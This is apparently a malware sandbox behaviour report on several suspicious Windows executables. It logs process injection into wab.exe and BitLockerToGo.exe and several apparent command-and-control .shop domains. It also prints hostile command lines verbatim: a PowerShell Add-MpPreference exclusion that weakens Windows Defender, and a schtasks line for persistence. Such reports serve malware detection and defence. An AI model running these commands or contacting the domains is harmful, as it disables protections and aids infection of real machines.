            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE2D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00007FF6AAE2D12C
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE2C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00007FF6AAE2C8A0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE3A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00007FF6AAE3A614
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA58C3028 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00007FFBA58C3028
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA58C2A70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00007FFBA58C2A70
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DB3D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00007FFBA5DB3D20
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DB42E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00007FFBA5DB42E8
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5E1D460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00007FFBA5E1D460
            Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: file.exe, ---.csReference to suspicious API methods: LoadLibrary(_0655_06D6(_FD4E_065B_06E2._FBB9_FDE6_FDDB_FBBE_065D_0608_0600_FDE3_060B))
            Source: file.exe, ---.csReference to suspicious API methods: GetProcAddress(, _0655_06D6(_FD4E_065B_06E2._06E8_FDD8_06E0))
            Source: file.exe, ---.csReference to suspicious API methods: VirtualProtect(procAddress, (uint)array.ToArray().Length, 64u, out var _060E_FBBA_FBC1)
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -ForceJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Program Files (x86)\Windows Mail\wab.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tryyudjasudqo.shop
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: eemmbryequo.shop
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: reggwardssdqw.shop
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: relaxatinownio.shop
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tesecuuweqo.shop
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tendencctywop.shop
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: licenseodqwmqn.shop
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keennylrwmqlw.shop
            Source: C:\Users\user\Desktop\file.exeSection unmapped: C:\Program Files (x86)\Windows Mail\wab.exe base address: 400000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 56C000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 58B000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 593000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 5D9000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 30EE008Jump to behavior
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 30F6008
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 444000
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 447000
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 457000
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -ForceJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"Jump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeProcess created: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeJump to behavior
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeProcess created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeProcess created: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe "C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe"
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeProcess created: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe "C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe"
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fDOF_PROGMAN
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DOF_PROGMAN
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE49570 cpuid 13_2_00007FF6AAE49570
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: ___lc_locale_name_func,__crtGetLocaleInfoEx,23_2_00007FFBA5DFF930
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,23_2_00007FFBA5DD9B90
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\PIL VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\PIL VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\PIL VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\PIL VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33402\_tcl_data\encoding VolumeInformationJump to behavior
